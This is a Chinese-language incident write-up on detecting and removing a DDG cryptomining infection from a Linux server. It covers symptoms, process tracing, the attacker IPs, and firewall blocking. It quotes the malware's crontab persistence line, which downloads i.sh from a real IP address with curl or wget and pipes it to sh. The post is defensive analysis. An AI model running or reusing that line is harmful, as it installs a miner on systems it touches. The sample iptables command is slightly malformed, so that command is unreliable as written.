服務器被攻擊后當作礦機，高WIO

礦機特點：

  

1. 操作系統反應慢。
2. wio 非常高，一般輕松達到50%，甚至達到100%。
   
3.  在/root/ 下存在 .ddg 隱藏路徑。路徑中有nnnn.db 二進制文件。
4.  /tmp 、/usr/libexec 、/usr/bin 等一個或者多個路徑中存在 新增可執行文件，如果存在多個，則名稱上來看，無實際意義。文件大小幾乎相同 ，通過diff命令，可執行文件無區別。
5.  存在連接至國外的網絡。
6.  使用root 登錄，並為root用戶添加定時任務。一般為每15分鍾連接外網下載名為 “i.sh”的文件並執行。

預防方法：

 

1. 網絡：禁止外網訪問，嚴格控制進出端口。
2. 服務器：禁止root直接遠程登錄，禁止Ping 服務器
3. 軟件：軟件不使用默認端口，很多黑客是通過軟件的默認端口和漏洞進行攻擊的。

    

下面是本次處理的過程。主要采用處理的方法是添加網絡防火牆，禁止訪問某個IP段 。下面是分析過程

---

 

主機CPU消耗過高

 

紅框標注的內容，都是可疑進程。從名字上來看，是兩類：vTtHH* 和ldrlfa* 。 先來看vTtHH* 這一類。

 

進程8907的父進程是1， 一般這種情況是由守護進程發起的。可是 守護進程沒找到 。因為守護進程的名字有可能是經過偽裝的。

而該文件存放於/tmp/路徑中：

 

 

紅框中的文件，是隨機生成的文件，文件名不一定有規律，但是文件大小相近，內容相同：

 

這些文件都是編譯過的二進制文件。是C/C++可執行文件。

沒有進程在使用這些文件。

 

繼續查看下ldrlfa* 這類命令。

 

可以看到分別於4月30日與5月11日，啟動了兩個命令：ldrlfa2 /ldrlfa3.這些命令存放於/usr/bin/.

 

發現這類文件會重復生成，生成的時間並沒有什么規律 。

定時任務

 

*/15 * * * * (/usr/bin/ldrlfa3||/usr/libexec/ldrlfa3||/usr/local/bin/ldrlfa3||/tmp/ldrlfa3||curl -m180 -fsSL http://104.128.230.16:8000/i.sh||wget -q -T180 -O- http://104.128.230.16:8000/i.sh) | sh

每15分鍾，執行一次，調用/usr/bin, /usr/libexec, /usr/local/bin /tmp 路徑下去查找

Ldrlfa3 命令, 並從104.128.230.16:8000 下載i.sh 文件並執行。

追蹤進程

[root@~ tmp]# lsof -p 16265

COMMAND   PID USER   FD      TYPE    DEVICE SIZE/OFF      NODE NAME

ldrlfa2 16265 root  cwd       DIR     253,0    49152 805306441 /usr/bin

ldrlfa2 16265 root  rtd       DIR     253,0      275        64 /

ldrlfa2 16265 root  txt       REG     253,0  4446828 8262721626 /usr/bin/ldrlfa2

ldrlfa2 16265 root  mem-W     REG     253,0    32768 825678047 /root/.ddg/4002.db

ldrlfa2 16265 root    0r      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    1w      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    2w      CHR       1,3      0t0      4787 /dev/null

ldrlfa2 16265 root    3r      CHR       1,9      0t0      4792 /dev/urandom

ldrlfa2 16265 root    4u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root    5uW     REG     253,0    32768 825678047 /root/.ddg/4002.db

ldrlfa2 16265 root    6u     IPv6 231916470      0t0       TCP *:7946 (LISTEN)

ldrlfa2 16265 root    7u     IPv6 231916471      0t0       UDP *:7946 

ldrlfa2 16265 root    8u     IPv4 260937900      0t0       TCP ~:19290->211.151.7.198:7946 (SYN_SENT)

ldrlfa2 16265 root    9r  a_inode       0,9        0      4783 inotify

ldrlfa2 16265 root   10u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root   11r     FIFO       0,8      0t0 216218160 pipe

ldrlfa2 16265 root   12w     FIFO       0,8      0t0 216218160 pipe

ldrlfa2 16265 root   13u  a_inode       0,9        0      4783 [eventpoll]

ldrlfa2 16265 root   14r     FIFO       0,8      0t0 231916473 pipe

ldrlfa2 16265 root   15w     FIFO       0,8      0t0 231916473 pipe

[root@pmo02 tmp]# cd /root/.ddg/

[root@pmo02 .ddg]# ls

4000.db  4001.db  4002.db  4003.db

[root@~ .ddg]# ls -lrt

總用量 96

-rw------- 1 root root 32768 4月  30 15:26 4001.db

-rw------- 1 root root 32768 5月   4 19:48 4000.db

-rw------- 1 root root 32768 5月  16 17:25 4003.db

-rw------- 1 root root 32768 5月  16 17:29 4002.db

[root@~ .ddg]# cat 4001.db 

ZCmd.Processed@<84\#\,\stBucket

;P_+R d(+˺z<?f0+qkwj"yHQGf0HqЎfзKo/

|H|˕bf*+8a+{w<1iky/&Df.k

z/!lAfHQh_O_qЎf_kw;Pv*4!G/

                     w;8ڀ}2Et5>sz֎<pyѵk

GrCfS

U7~
vux9w'!

R

從追蹤進程來看，挖礦進程，會將本機的 19290端口轉發至211.151.7.198:7946端口. 

 

在/root 路徑下自動創建了隱藏文件夾.ddg/ ，該路徑下存放着 幾個 nnnn.db ，而該文件是二進制文件。看不懂。 直接將.ddg 刪除。

網絡分析

檢查當前主機上的網絡連接，發現部分異常IP和端口（挖礦進程是需要與外網進行通信的）。從主機上查看：

 

94.130.49.186    --> 烏克蘭

95.216.74.37      --> 烏克蘭

182.92.12.11      --> 北京大興，阿里雲

5.79.108.34        --> 荷蘭

104.128.230.16  --> 美國

從最終處理結果來看，這是一個正確的方向。

處理方法

將以上發現的定時任務、可執行文件內容全部刪除 。

同時防火牆拒絕以上5個地址的全IP段，同時拒絕下載i.sh 文件的IP網絡。

添加防火牆策略示例如下：

Iptables –I INPUT 94.0.0.0/8 –j DROP 

添加完成后，需要執行service iptables save 將策略保存。